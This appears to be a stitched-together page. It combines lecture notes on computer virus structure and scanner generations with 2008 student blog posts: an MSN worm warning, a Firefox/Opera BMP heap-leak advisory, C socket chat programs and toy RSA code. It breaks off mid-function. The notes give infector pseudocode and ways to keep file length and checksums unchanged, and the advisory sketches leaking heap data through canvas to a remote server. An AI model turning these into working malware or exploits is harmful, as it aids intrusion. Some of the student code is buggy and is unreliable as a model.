Integrated mail systems such as Microsoft Outlook make it very simple to send not only a quick note edited within a limited text editor but also previously composed computer documents of arbitrary complexity to anyone, and to work with objects that you receive via standards such as MIME. They also support application programming interfaces (such as MAPI) that allow programs to send and process mail automatically. Well over 500 million E-mail messages are delivered daily in July 2000.

Mobile-program systems are becoming more and more widespread. The most widely-hyped examples today are Java and ActiveX. This technology became popular with Web servers and browsers, but it is now integrated (e.g., Java into Lotus Notes, and ActiveX into Outlook) mail systems. Both Java and ActiveX have been found to have security bugs.

Structure of Viruses

Here is a simple structure of a virus. In the infected binary, at a known byte location in the file, a virus inserts a signature byte used to determine if a potential carrier program has been previously infected.

V()
{
infectExecutable();
if (triggered())
{
doDamage();
}
jump to main of infected program;
}

void infectExecutable()
{
file = chose an uninfected executable file;
prepend V to file;
}

void doDamage()
{
…
}

int triggered()
{
return (some test? 1 : 0);
}

The above virus makes the infected file longer than it was, making it easy to spot. There are many techniques to leave the file length and even a check sum unchanged and yet infect. For example, many executable files often contain long sequences of zero bytes, which can be replaced by the virus and re-generated. It is also possible to compress the original executable code like the typical Zip programs do, and uncompress before execution and pad with bytes so that the check sum comes out to be what it was.

Virus Detection

Known viruses are by far the most common security problem on modern computer systems. Several web sites maintain complete lists of known viruses. There are thousands. Visit, e.g., www.cai.com/ virusinfo/ encyclopedia/. In the month of July 2000, there were 200+ “PC Viruses in the Wild” (www. wildlist. org). Virus detection programs analyze a suspect program for the presence of known viruses.

Fred Cohen has proven mathematically that perfect detection of unknown viruses is impossible: no program can look at other programs and say either “a virus is present” or “no virus is present”, and always be correct. But, in the real world, most new viruses are sufficiently like old viruses that the same sort of scanning that finds known viruses also finds the new ones. And there are a large number of heuristic tricks that anti-virus programs use to detect new viruses, based either on how they look, or what they do. These heuristics are only sometimes successful, but since brand-new viruses are comparatively rare, they are sufficient to the purpose.

Virus scanners are sometimes classified by their “generation.” The first generation virus scanners used previously obtained a virus signature, a bit pattern, to detect a known virus. They record and check the length of all executables. The second generation scans executables with heuristic rules, looking, e.g., for fragments of code associated with a typical virus. They also do integrity checking by calculating a checksum of a program and storing somewhere else the encrypted checksum. The third generation use a memory resident program to monitor the execution behavior of programs to identify a virus by the types of action that the virus takes. The fourth Generation Virus Detection combines all previous approaches and includes access control capabilities.

It is very educational to study the details of a scanner. The paper by Sandeep Kumar, and Gene Spafford, “A Generic Virus Scanner in C++,” Proceedings of the 8th Computer Security Applications Conference, IEEE Press, Piscataway, NJ; pp. 210-219, 2-4 Dec 1992 [paper] is required reading.

Another MSN worm spreading rapidly

2008-02-24T07:35:00.000+05:30

Another MSN worm spreading with the same tactics as usual, “Wanna see my pictures before i send em to facebook?” and so on.

The only really interesting thing about this worm is it sends the message in the language of the locale installed on the infected machine, this is pretty intelligent and is much more likely to work as most of the people on sometimes contact list are probably from the same country or at least use the same language

The IRCBOT-RB Trojan poses as messages containing links to pictures on social networking sites such as MySpace and Facebook. Typical come-ons involve messages such as “Wanna see my pictures before i send em to facebook?”. Clicking on a link takes users to booby-trapped websites.

Unusually, the polyglot malware changes these messages according to the language of the affected operating system used. Compromised machines are infected by a simple bot agent that leaves the hardware hooked up to a central control server, awaiting instructions.

This would mean it’s much more believable than someone who speaks Portuguese to their friends sending a message in English. As usual please educate people not to blindly follow or click links and definitely don’t accept files sent by friends on MSN/Yahoo! or AIM as they are most likely auto-generated by a trojan.

Do message the person back manually and ask them if they really sent it.

Firefox and Opera Memory Information Leak

2008-02-22T20:58:00.000+05:30

SUMMARY

Opera and Firefox contains vulnerable code for handling BMP files with partial palette. The code allows to craft a BMP file that leaks information from the heap. This information can be sent to remote server using canvas tag (HTML 5) and JavaScript.

Also other browser (for example Apple Safari) contain vulnerable BMP handling code, but since there is no way of acquiring the image data (due to not all canvas method being implemented), it doesn't pose a serious threat. As a matter of fact Apple Safari has a similar problem with certain GIF files.

DETAILS

Vulnerable Systems:

Firefox version 2.0.0.11 and prior that support canvas.getImageData or any other method to acquire image data are affected
Opera version 9.50 beta

Immune Systems:

Firefox version 2.0.0.12
Opera version 9.24
Opera version 9.25

The BMP format has a field in the BITMAPINFOHEADER named biClrUsed, the field says how many colors does the palette contain. If this field is 0, then 256 color palette is used. When this field is not 0, the palette has the given number of colors.

Both browsers either allocate to just the "right" amount of memory (using the equation biClrUsed * sizeof(RGB)), or forget to zero the allocated palette. In this case, if a color from the upper (non existing or not zeroed) part of the palette is used, some information is copied to the screen as a colorful pixel.

If the attacker creates a BMP file with biClrUser = 0, and fills it with gradient, from 0 to 255: 00 01 02 03 04 05 ... and so on, the displayed BMP will in fact copy the palette to the screen, which of course means that it copies the data lying on the heap to the screen.

The attacker could also use HTML 5 tag canvas to acquire pixel color information from the bitmap, and then use JavaScript to post it to a remote server.

The harvested data contains various information including parts of other websites, users "favorites" and history, and other information.

Video demonstration

A video demonstration of the vulnerability:

http://blog.hispasec.com/lab/files/ff_2_0_0_11.avi

ADDITIONAL INFORMATION

Firefox 2.0.0.11 may crash when using this vulnerability due to heap boundary error (read access violation). So it is possible to remotely crash the browser.

This bug has been reported by Gynvael Coldwind.

Network Programming Assignment

2008-02-21T13:26:00.004+05:30

Client

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

void error(char *msg)
{
perror(msg);
exit(0);
}

int sigflag;

int sigio_fun()
{
//    printf("Handling SIGIO\n");
sigflag = 1;
}

void sigint()
{
signal(SIGINT,sigint);
printf("SIGINT Received. I will exit now\n");
//exit(0);
}


int main(int argc, char *argv[])
{
int sockfd, portno, n;
struct sockaddr_in serv_addr;
struct hostent *server;
char buffer[1024];

if (argc < 3)
{
fprintf(stderr,"usage %s hostname port\n", argv[0]);
exit(0);
}
portno = atoi(argv[2]);
sockfd = socket(AF_INET, SOCK_STREAM, 0);

if (sockfd < 0)
error("main: socket error");
server = gethostbyname(argv[1]);

if (server == NULL)
{
fprintf(stderr,"Error: no such host\n");
exit(0);
}

bzero((char *) &serv_addr, sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
bcopy((char *)server->h_addr, (char *)&serv_addr.sin_addr.s_addr, server->h_length);

serv_addr.sin_port = htons(portno);

if (connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0)
error("main: connect error");

signal(SIGIO, (void *)sigio_fun);
signal(SIGINT, (void *)sigint);

if (fcntl(sockfd, F_SETOWN, getpid()) < 0)
error("main: F_SETOWN error");
if (fcntl(sockfd, F_SETFL, FASYNC) < 0)
error("main: F_SETFL error");

#ifdef NORMAL
printf("Arun: ");
bzero(buffer, 1024);
fgets(buffer, 1023, stdin);
send(sockfd, buffer, strlen(buffer), NULL);

bzero(buffer, 1024);
while (recv(sockfd, buffer, 1023, NULL) > 0)
{
printf("Computer: %s\n", buffer);
printf("Arun: ");
bzero(buffer, 1024);
fgets(buffer, 1023, stdin);
if (send(sockfd, buffer, strlen(buffer), NULL) < 0)
{
perror("main: write error");
exit(1);
}
bzero(buffer, 1024);
}
#endif

#ifdef SIGNAL
while (1)
{
printf("Arun: ");
bzero(buffer, 1024);
fgets(buffer, 1023, stdin);
n = send(sockfd, buffer, strlen(buffer), NULL);
if (n < 0)
error("main: write error");

sigblock(sigmask(SIGIO));
while (sigflag == 0)
sigpause(0); /* wait for interrupt */

bzero(buffer, 1024);
n = recv(sockfd, buffer, 1023, NULL);
if (n < 0)
error("main: read error");

printf("%s\n", buffer);
sigflag = 0;
sigsetmask(0);
}
#endif

close(sockfd);
return 0;
}

Server

#include 
#include 
#include 
#include 
#include 
#include 

#define MAX_T 10
#define PORT 8010

int Connect[MAX_T];
struct sockaddr_in clients[MAX_T];

pthread_mutex_t mutex;
pthread_t tid[MAX_T];

void *ThreadProc(void *i)
{
int count = (int) i;
int j;
int error, clilen;
char *Buff, *Buff1;

Buff = calloc(1000, sizeof(char));
Buff1 = calloc(1024,sizeof(char));

do{
memset(Buff, '\0', sizeof(Buff));
memset(Buff1, '\0', sizeof(Buff1));
error = recv(Connect[count], Buff, sizeof(Buff), 0);
printf ("Received data\n");

if (error < 0)
{
perror("recv error");
return;
}

//Chances for Deadlock here
pthread_mutex_lock(&mutex);
sprintf(Buff1, "%s says: %s", inet_ntoa(clients[count].sin_addr), Buff);

for (j = 0; j < MAX_T; j++)
{
if (Connect[j] != 0 && j != count)
{
error = sendto(Connect[j], Buff, sizeof(Buff), 0, (struct sockaddr*)&clients[j], sizeof(clients[j]));
if (error < 0)
{
send(Connect[count], "Unable to send your message", 27, 0);
perror("sendto error");
exit(1);
}
printf ("Message sent\n");
send(Connect[count], "Your message was sent to all", 30, 0);
}
}
pthread_mutex_unlock(&mutex);
}while(strcmp("bye",Buff));

close(Connect[count]);
free(Buff);
free(Buff1);
return;
}

int main()
{
int Listen;
struct sockaddr_in server;
int i, error, clilen;

if (pthread_mutex_init(&mutex, NULL))
{
perror("Mutex initiallization error");
exit(1);
}
Listen = socket(AF_INET, SOCK_STREAM, 0);

bzero((char*)&server, sizeof(server));
server.sin_family = AF_INET;
server.sin_addr.s_addr = INADDR_ANY;
server.sin_port = htons(PORT);

error = bind(Listen, (struct sockaddr *)&server, sizeof(server));
if (error < 0)
{
perror("bind error");
exit(1);
}
for (i = 0; i < MAX_T; i++)
Connect[i] = 0;

listen(Listen, 5);

for (i = 0; i < MAX_T; i++)
{
clilen = sizeof(clients[i]);
Connect[i]  = accept(Listen, (struct sockaddr *)&clients[i], &clilen);

if (Connect[i] < 0)
{
perror("accept error");
exit(1);
}

if (pthread_create(&tid[i], NULL, (void *)ThreadProc, (void *)i))
{
perror("Thread creation error");
exit(1);
}
}

for (i = 0; i < MAX_T; i++)
pthread_join(tid[i], NULL);
return 0;
}

WinSocks

2008-02-18T10:51:00.004+05:30

A Multithreaded TCP Server on winsock:

#include 
#include 
#include 
#include 
#include 

#define SERVER_PORT 6000
#define SERVER_ADDRESS "127.0.0.1"

//Initialize WinSock library

int WinSockInitialize()
{
int err;
WORD wVersionRequired;
WSADATA wsaData;
wVersionRequired = MAKEWORD(1,1);
err = WSAStartup(wVersionRequired, &wsaData);
if (err != 0)
exit(1);
return(0);
}

// Thread Function
DWORD ThreadProc(LPVOID* ThreadId)
{
int error;
char Buffer[1000];

unsigned int ConnectedSock = (unsigned int) *ThreadId;
printf("Connection received\n");

// Read Client message
do{
memset(Buffer, '\0', 1000);
error = recv (ConnectedSock, Buffer, sizeof(Buffer), 0);

printf ("Client says: %s\n", Buffer);

if (error == SOCKET_ERROR)
{
printf("Thread : recv() error : %d\n",GetLastError());
closesocket(ConnectedSock);
exit(1);
}

error = send ( ConnectedSock, Buffer, sizeof(Buffer), 0);
if (error == SOCKET_ERROR)
{
printf("server : send() error : %d\n",GetLastError());
closesocket(ConnectedSock);
exit(1);
}
}while (strncmp(Buffer,"bye", 3));
closesocket(ConnectedSock);
return (0);
}


//***********************************************************
//server program
//***********************************************************

int main()
{
SOCKET ListenSock, ConnectedSock;
int ClientAddressLength, error;
struct sockaddr_in ClientAddress, ServerAddress;
unsigned long ThreadId[5];

// Initialize WinSock library
//
WinSockInitialize();

//Open a TCP socket
if ( (ListenSock = socket(AF_INET, SOCK_STREAM,0) ) == INVALID_SOCKET)
{
printf("server : cannot open stream socket: %d\n",GetLastError());
exit(1);
}

//Bind a known address
ServerAddress.sin_family = AF_INET;
ServerAddress.sin_addr.s_addr = inet_addr(SERVER_ADDRESS);
ServerAddress.sin_port = htons(SERVER_PORT);

if (bind (ListenSock, (struct sockaddr *)&ServerAddress, sizeof(ServerAddress)) != 0)
{
printf("server : cannot bind address: %d\n",GetLastError());
exit(0);
}

int QueueSize=1000;
printf("Client queue size=%d.\n", QueueSize);
error=listen(ListenSock, QueueSize);
if (error)
{
printf("server : listen() error : %d\n",GetLastError());
exit(0);
}
//unsigned long ulNonBlocked=1;
//ioctlsocket(ListenSock,FIONBIO, &ulNonBlocked);

int i = 0;
for (;;)
{
//Wait for connection from client
ClientAddressLength = sizeof(ClientAddress);
ConnectedSock = accept(ListenSock, (struct sockaddr *) &ClientAddress, &ClientAddressLength);

if (ConnectedSock == INVALID_SOCKET)
{
printf("server : accept() error: %d\n",GetLastError());
break;
}
printf("Connection received\n");

if (CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)&ThreadProc, (LPVOID) &ConnectedSock, 0, &ThreadId[i++]) == NULL)
{
printf ("Error creating thread\n");
exit(1);
}
printf("Thread Created: %d\n", &ThreadId[i]);

}

closesocket(ListenSock);

if ( WSACleanup() !=0 )
printf("WSACleanup() Error\n");
return 0;
}

TCP client on winsock

//***********************************************************
//client program
//***********************************************************

#include 
#include 
#include 
#include 
#include 

#define SERVER_PORT 6000
#define SERVER_ADDRESS "127.0.0.1"
#define SERVER_REPLY "Server Reply\n"
#define CLIENT_REQUEST "Client Request\n"

int WinSockInitialize()
{
int err;
WORD wVersionRequired;
WSADATA wsaData;
wVersionRequired = MAKEWORD(1,1);
err = WSAStartup(wVersionRequired, &wsaData);
if (err != 0)
exit(1);
return(0);
}

int main()
{
SOCKET ClientSock;
struct sockaddr_in ServerAddress;
char szBuffer[1000];
int error;

// Initialize WinSock library
//
WinSockInitialize();
memset(szBuffer, '\0', 1000);

//Open a TCP socket
if ((ClientSock = socket(AF_INET, SOCK_STREAM,0) ) == INVALID_SOCKET)
{
printf("client : cannot open stream socket: %d\n", GetLastError());
exit(1);
}

//Fill in a server's address
ServerAddress.sin_family = AF_INET;
ServerAddress.sin_addr.s_addr = inet_addr(SERVER_ADDRESS);
ServerAddress.sin_port = htons(SERVER_PORT);

//Issue connect request to server
if (connect(ClientSock, (struct sockaddr *) &ServerAddress, sizeof(ServerAddress)) == SOCKET_ERROR)
{
printf("client : cannot connect to server: %d\n", GetLastError());
printf ("%d", ClientSock);
exit(1);
}

// Write request to server
int i = 1;
for (;;)
{
i++;
sprintf(szBuffer, CLIENT_REQUEST);
if (i == 6)
{
memset(szBuffer,'\0',1000);
sprintf (szBuffer, "bye");
error = send(ClientSock, szBuffer, sizeof(szBuffer), 0);
if (error == SOCKET_ERROR)
{
printf("client : send() error : %d\n",GetLastError());
closesocket(ClientSock);
exit(0);
}
break;
}
error = send(ClientSock, szBuffer, sizeof(szBuffer), 0);
if (error == SOCKET_ERROR)
{
printf("client : send() error : %d\n",GetLastError());
closesocket(ClientSock);
exit(0);
}
// Read Reply from Server
error = recv ( ClientSock, szBuffer, sizeof(szBuffer), 0);
if (error == SOCKET_ERROR)
{
printf("server : recv() error : %d\n",GetLastError());
closesocket(ClientSock);
exit(0);
}
printf("Reply from server:%s\n", szBuffer);
}
closesocket(ClientSock);
if ( WSACleanup() !=0 )
printf("WSACleanup() Error\n");
return 0;
}

RSA - 2

2008-02-18T02:19:00.010+05:30

This is another problem for which I have written a code to solve. I dont know why, but I took too long to solve this simple thing. I was confusing myself with cin, streams, etc. I need to brush up my C++ as soon as possible.

#include 

using namespace std;

int main(int argc, char** argv)
{
if (argc < 2)
{
printf ("Usage: %s \n", argv[0]);
exit(0);
}

int e, d, p, q, fi, N;
int *C, *F;
char *M, *K;
int i, j, k;

cout << "Provide Public key(e), Prime numbers(p,q): ";
cin >> e >> p >> q;
M = new char[argc];
bzero(M, argc);

fi = (p-1)*(q-1);
for (d = 1; d < fi; d++)
if ( (d*e) % fi == 1)
break;
cout << endl << "Private key(d): " << d << endl;

K = M;
for (k = 1; k < argc; k++, K++)
{
unsigned long long P = 1;
N = atoi(argv[k]);
for (i = d; i >= 1; i--)
P = P * N;

j = (P % (p*q)) + 96;
sprintf (K, "%c", j);
}
cout << "Message(M): " << M << endl;
delete M;
return 0;
}

Sample output

[user23@icis_linux user23]$ ./RSA3 27 1 18 26
Provide Public key(e), Prime numbers(p,q): 3 3 11

Private key(d): 7
Message(M): cafe
[user23@icis_linux user23]$

For more Linux programmers, I have one additional information. I ran my code with "valgrind -v --leak-check=full --show-reachable=yes" options. It seems to find some bug with the some system libraries. I will debug it when I have time.Here is the Valgrind output for reference.

[user23@icis_linux user23]$ valgrind -v --leak-check=full --show-reachable=yes ./RSA3 1
==6415== Memcheck, a memory error detector.
==6415== Copyright (C) 2002-2007, and GNU GPL'd, by Julian Seward et al.
==6415== Using LibVEX rev 1804, a library for dynamic binary translation.
==6415== Copyright (C) 2004-2007, and GNU GPL'd, by OpenWorks LLP.
==6415== Using valgrind-3.3.0, a dynamic binary instrumentation framework.
==6415== Copyright (C) 2000-2007, and GNU GPL'd, by Julian Seward et al.
==6415==
--6415-- Command line
--6415--    ./RSA3
--6415--    1
--6415-- Startup, with flags:
--6415--    -v
--6415--    --leak-check=full
--6415--    --show-reachable=yes
--6415-- Contents of /proc/version:
--6415--   Linux version 2.4.20-8smp (bhcompile@porky.devel.redhat.com) (gcc version 3.2.2 20030222 (Red Hat Linux 3.2.2-5)) #1 SMP Thu Mar 13 17:45:54 EST 2003
--6415-- Arch and hwcaps: X86, x86-sse1-sse2
--6415-- Page sizes: currently 4096, max supported 4096
--6415-- Valgrind library directory: /home/user23/Valgrind/lib/valgrind
--6415-- Reading syms from /lib/ld-2.3.2.so (0x4000000)
--6415-- Reading syms from /home/user23/RSA3 (0x8048000)
--6415-- Reading syms from /home/user23/Valgrind/lib/valgrind/x86-linux/memcheck (0x38000000)
--6415--    object doesn't have a dynamic symbol table
--6415-- Reading suppressions file: /home/user23/Valgrind/lib/valgrind/default.supp
--6415-- REDIR: 0x40114a0 (index) redirected to 0x38022cdf (vgPlain_x86_linux_REDIR_FOR_index)
--6415-- Reading syms from /home/user23/Valgrind/lib/valgrind/x86-linux/vgpreload_core.so (0x4017000)
--6415-- Reading syms from /home/user23/Valgrind/lib/valgrind/x86-linux/vgpreload_memcheck.so (0x4019000)
==6415== WARNING: new redirection conflicts with existing -- ignoring it
--6415--     new: 0x040114a0 (index               ) R-> 0x0401c5e0 index
--6415-- REDIR: 0x4011640 (strlen) redirected to 0x401c804 (strlen)
--6415-- Reading syms from /usr/lib/libstdc++.so.5.0.3 (0x403C000)
--6415--    object doesn't have a symbol table
--6415-- Reading syms from /lib/libm-2.3.2.so (0x40EF000)
--6415-- Reading syms from /lib/libgcc_s-3.2.2-20030225.so.1 (0x4111000)
--6415--    object doesn't have a symbol table
--6415-- Reading syms from /lib/libc-2.3.2.so (0x411A000)
--6415-- REDIR: 0x4194500 (rindex) redirected to 0x401c508 (rindex)
--6415-- REDIR: 0x4193a40 (strcpy) redirected to 0x401c83c (strcpy)
--6415-- REDIR: 0x41941d0 (strlen) redirected to 0x401c7e8 (strlen)
Provide Public key(e), Prime numbers(p,q): 3 3 11
--6415-- REDIR: 0x4196130 (memcpy) redirected to 0x401cb50 (memcpy)
--6415-- REDIR: 0x4195900 (memchr) redirected to 0x401cb2c (memchr)
--6415-- REDIR: 0x40c7e70 (operator new(unsigned)) redirected to 0x401acc8 (operator new(unsigned))
--6415-- REDIR: 0x4195b20 (memset) redirected to 0x401d1b0 (memset)
--6415-- REDIR: 0x40c7fd0 (operator new[](unsigned)) redirected to 0x401b1b0 (operator new[](unsigned))

Private key(d): 7
Message(M): a
--6415-- REDIR: 0x40c69c0 (operator delete[](void*)) redirected to 0x401bc00 (operator delete[](void*))
--6415-- REDIR: 0x418cf40 (free) redirected to 0x401b578 (free)
==6415==
==6415== ERROR SUMMARY: 0 errors from 0 contexts (suppressed: 19 from 1)
--6415--
--6415-- supp:     19 Ubuntu-stripped-ld.so
==6415== malloc/free: in use at exit: 640 bytes in 1 blocks.
==6415== malloc/free: 2 allocs, 1 frees, 642 bytes allocated.
==6415==
==6415== searching for pointers to 1 not-freed blocks.
==6415== checked 108,340 bytes.
==6415==
==6415== 640 bytes in 1 blocks are still reachable in loss record 1 of 1
==6415==    at 0x401AD35: operator new(unsigned) (vg_replace_malloc.c:224)
==6415==    by 0x40B4830: std::__default_alloc_template::_S_chunk_alloc(unsigned, int&) (in /usr/lib/libstdc++.so.5.0.3)
==6415==    by 0x40B473C: std::__default_alloc_template::_S_refill(unsigned) (in /usr/lib/libstdc++.so.5.0.3)
==6415==    by 0x40B42AB: std::__default_alloc_template::allocate(unsigned) (in /usr/lib/libstdc++.so.5.0.3)
==6415==    by 0x40BA2A7: std::string::_Rep::_S_create(unsigned, std::allocator const&) (in /usr/lib/libstdc++.so.5.0.3)
==6415==    by 0x40BA3D8: std::string::_Rep::_M_clone(std::allocator const&, unsigned) (in /usr/lib/libstdc++.so.5.0.3)
==6415==    by 0x40B8145: std::string::reserve(unsigned) (in /usr/lib/libstdc++.so.5.0.3)
==6415==    by 0x40B86EB: std::string::append(unsigned, char) (in /usr/lib/libstdc++.so.5.0.3)
==6415==    by 0x4094E73: std::num_get <char, std::istreambuf_iterator<char, std::char_traits > >::_M_extract_int(std::istreambuf_iterator<char, std::char_traits >, std::istreambuf_iterator<char, std::char_traits >, std::ios_base&, std::_Ios_Iostate&, std::string&, int&) const (in /usr/lib/libstdc++.so.5.0.3)
==6415==    by 0x40958CC: std::num_get <char, std::istreambuf_iterator<char, std::char_traits > >::do_get(std::istreambuf_iterator<char, std::char_traits >, std::istreambuf_iterator<char, std::char_traits >, std::ios_base&, std::_Ios_Iostate&, long&) const (in /usr/lib/libstdc++.so.5.0.3)
==6415==    by 0x4084D5A: std::istream::operator>>(int&) (in /usr/lib/libstdc++.so.5.0.3)
==6415==    by 0x80488FB: main (in /home/user23/RSA3)
==6415==
==6415== LEAK SUMMARY:
==6415==    definitely lost: 0 bytes in 0 blocks.
==6415==      possibly lost: 0 bytes in 0 blocks.
==6415==    still reachable: 640 bytes in 1 blocks.
==6415==         suppressed: 0 bytes in 0 blocks.
--6415--  memcheck: sanity checks: 2 cheap, 2 expensive
--6415--  memcheck: auxmaps: 0 auxmap entries (0k, 0M) in use
--6415--  memcheck: auxmaps_L1: 0 searches, 0 cmps, ratio 0:10
--6415--  memcheck: auxmaps_L2: 0 searches, 0 nodes
--6415--  memcheck: SMs: n_issued      = 9 (144k, 0M)
--6415--  memcheck: SMs: n_deissued    = 0 (0k, 0M)
--6415--  memcheck: SMs: max_noaccess  = 65535 (1048560k, 1023M)
--6415--  memcheck: SMs: max_undefined = 0 (0k, 0M)
--6415--  memcheck: SMs: max_defined   = 33 (528k, 0M)
--6415--  memcheck: SMs: max_non_DSM   = 9 (144k, 0M)
--6415--  memcheck: max sec V bit nodes:    0 (0k, 0M)
--6415--  memcheck: set_sec_vbits8 calls: 0 (new: 0, updates: 0)
--6415--  memcheck: max shadow mem size:   448k, 0M
--6415-- translate:            fast SP updates identified: 3,418 ( 86.4%)
--6415-- translate:   generic_known SP updates identified: 262 (  6.6%)
--6415-- translate: generic_unknown SP updates identified: 274 (  6.9%)
--6415--     tt/tc: 6,560 tt lookups requiring 6,708 probes
--6415--     tt/tc: 6,560 fast-cache updates, 3 flushes
--6415--  transtab: new        3,148 (65,734 -> 939,221; ratio 142:10) [0 scs]
--6415--  transtab: dumped     0 (0 -> ??)
--6415--  transtab: discarded  6 (153 -> ??)
--6415-- scheduler: 251,886 jumps (bb entries).
--6415-- scheduler: 2/3,481 major/minor sched events.
--6415--    sanity: 3 cheap, 2 expensive checks.
--6415--    exectx: 769 lists, 11 contexts (avg 0 per list)
--6415--    exectx: 22 searches, 11 full compares (500 per 1000)
--6415--    exectx: 0 cmp2, 51 cmp4, 0 cmpAll
--6415--  errormgr: 9 supplist searches, 112 comparisons during search
--6415--  errormgr: 19 errlist searches, 51 comparisons during search
[user23@icis_linux user23]$

RSA

2008-02-17T19:11:00.005+05:30

I did my NPM assignment today. It was partly on RSA encryption and decryption. The assignment was to find the message (M) when the cyper text (C) and the public key pair (e, n) are given.

I just wrote this small program to calculate M.

#include 

using namespace std;

int main()
{
int C, M, e, d, n, p, q, fi;
int i;
cout << "Enter the Cypher text(C), Public key(e,n): ";
cin >> C >> e >> n;

// Find the factors of n: p, q & fi
for (p = 2; p < n; p++)
{
if (!(n%p))
{
q = n/p;
fi = (p-1)*(q-1);
break;
}
}

// Find the private key d
for (d = 1; d < fi; d++)
if ( (d*e) % fi == 1)
break;

/* P is the temporary Variable to store C^d
* I am assuming that the value of P will not exceed
* the maximum value of unsigned long long datatype
* which is = +18,446,744,073,709,551,615 (2^64)
* 64 bit processor, conforming to gcc standard
*/
unsigned long long P = 1;
for (i = d; i >= 1; i--)
P = P * C;
M = P%n;

cout << "Private key(d): " << d
<< endl
<< "Plain text(M): " << M << endl;
}

CompilationAs usual, the compile line is this.

g++ RSA.cpp -o RSA

Sample output

[user23@icis_linux user23]$ ./RSA
Enter the Cypher text(C), Public key(e,n): 10 5 35
Private key(d): 5
Plain text(M): 5
[user23@icis_linux user23]$

It should be noted that the value of P should not exceed its datatype maximum value. The following shows the sample output when it exceeds. As you can see, the message text will be 0.

[user23@icis_linux user23]$ ./RSA
Enter the Cypher text(C), Public key(e,n): 66 5 119
Private key(d): 77
Plain text(M): 0
[user23@icis_linux user23]$

Threaded TCP Server-Client

2008-02-08T10:43:00.001+05:30

Following my post on TCP Chat for 1 to 1, this is a program to implement a multithreaded server and client through TCP.

Server

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

#define MAX_CLIENT_PER_THREAD 1
#define MAX_THREAD 20
#define PORT 3355
#define HIGHFD MAX_CLIENT_PER_THREAD * MAX_THREAD
int listenfd;
int which_thread = 0;


/*
* * FD_ZERO()
* *
* *
* *
* */

typedef struct 
{
pthread_t tid;
int tnumber;
long client_count;
int clients[MAX_CLIENT_PER_THREAD];
fd_set clientset;
} Thread;

pthread_cond_t new_connection_cond = PTHREAD_COND_INITIALIZER;
pthread_mutex_t new_connection_mutex = PTHREAD_MUTEX_INITIALIZER;


Thread threads[MAX_THREAD];

void nonblock(int sockfd)
{
int opts;
opts = fcntl(sockfd, F_GETFL);
if (opts < 0)
{
perror("fcntl(F_GETFL)\n");
exit(1);
}
opts = (opts | O_NONBLOCK);
if (fcntl(sockfd, F_SETFL, opts) < 0)
{
perror("fcntl(F_SETFL)\n");
exit(1);
}
}

void *thread_init_func(void *arg)
{
int tid = (int) arg;
int readsocks;
int i;
char buffer[1024];
int n;
fd_set readset;
int clifd;

struct timeval tv;
tv.tv_sec = 0;
tv.tv_usec = 1;
#ifdef DEBUG
printf("thread %d created\n", tid);
printf("sizeof thread.clients: %d\n", sizeof(threads[tid].clients));
#endif
memset((int *) &threads[tid].clients, 0,
sizeof(threads[tid].clients));

while(1)
{
#ifdef DEBUG
printf("thread %d running, client count: %d\n", tid, threads[tid].client_count);
sleep(3);
#endif
sleep(1);
readset = threads[tid].clientset;
readsocks = select(HIGHFD + 1, &readset, NULL, NULL, &tv);

for (i = 0; i < threads[tid].client_count; i++)
{
if (threads[tid].clients[i] == 0)
continue;
if (FD_ISSET(threads[tid].clients[i], &readset))
{
n = read(threads[tid].clients[i], buffer, sizeof(buffer));
if (n == 0)
{
#ifdef DEBUG
printf("client %d closed connection 0\n", threads[tid].clients[i]);
#endif
FD_CLR(threads[tid].clients[i], &threads[tid].clientset);
threads[tid].clients[i] = 0;
threads[tid].client_count--;
}
else if (n < 0)
{
if (errno == EAGAIN)
{
#ifdef DEBUG
printf("errno: EAGAIN\n");
#endif
}
else
{
#ifdef DEBUG
printf("errno: %d\n", errno);
#endif
FD_CLR(threads[tid].clients[i], &threads[tid].clientset);
threads[tid].clients[i] = 0;
threads[tid].client_count--;
#ifdef DEBUG
printf("client %d closed connection -1\n", threads[tid].clients[i]);
#endif
}
}
else
{
printf("\n %d bytes received from %d - %s\n", n, threads[tid].clients[i], buffer);
send(threads[tid].clients[i], buffer, strlen(buffer), 0);
}

}
}
}
}

int choose_thread()
{
int i = MAX_THREAD - 1;
int min = 0;
while(i > -1)
{
if (threads[i].client_count < threads[i-1].client_count)
{
min = i;
break;
}
i--;
}
return min;
}

int main()
{
char c;
struct sockaddr_in srv, cli;
int clifd;
int tid;
int i;
int choosen;

if ((listenfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("sockfd");
exit(1);
}
bzero(&srv, sizeof(srv));
srv.sin_family = AF_INET;
srv.sin_addr.s_addr = INADDR_ANY;
srv.sin_port = htons(PORT);

if (bind(listenfd, (struct sockaddr *) &srv, sizeof(srv)) < 0)
{
perror("bind");
exit(1);
}

listen(listenfd, 5);


/* create threads */
for (i = 0; i < MAX_THREAD; i++)
{
pthread_create(&threads[i].tid, NULL, &thread_init_func, (void *)i);
threads[i].client_count = 0;
}


for (;;)
{
clifd = accept(listenfd, NULL, NULL);
nonblock(clifd);

pthread_mutex_lock(&new_connection_mutex);

choosen = choose_thread();;

for (i = 0; i < MAX_CLIENT_PER_THREAD; i++)
{
if (threads[choosen].clients[i] == 0)
{
threads[choosen].clients[i] = clifd;
threads[choosen].client_count++;
FD_SET(threads[choosen].clients[i], &threads[choosen].clientset);
break;
}
}

#ifdef DEBUG
printf("choosen: %d\n", choosen);

for (i = 0; i < MAX_THREAD; i++)
{
printf("threads[%d].client_count:%d\n", i,
threads[i].client_count);
}
#endif

pthread_mutex_unlock(&new_connection_mutex);
}

return 0;
}

Client

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 


#define MAX_CLIENT 20

int PORT = 3355;
char *IP = "155.69.221.20";

enum
{
U_INT_SIZE = sizeof(unsigned int)
};

int list[MAX_CLIENT];
fd_set fdset;
int highfd = MAX_CLIENT;

void nonblock(int sockfd)
{
int opts;
opts = fcntl(sockfd, F_GETFL);
if (opts < 0)
{
perror("fcntl(F_GETFL)\n");
exit(1);
}
opts = (opts | O_NONBLOCK);
if (fcntl(sockfd, F_SETFL, opts) < 0)
{
perror("fcntl(F_SETFL)\n");
exit(1);
}
}


void cli_con()
{
struct sockaddr_in srv;
struct hostent *h_name;
int clifd;
int n;

bzero(&srv, sizeof(srv));
srv.sin_family = AF_INET;
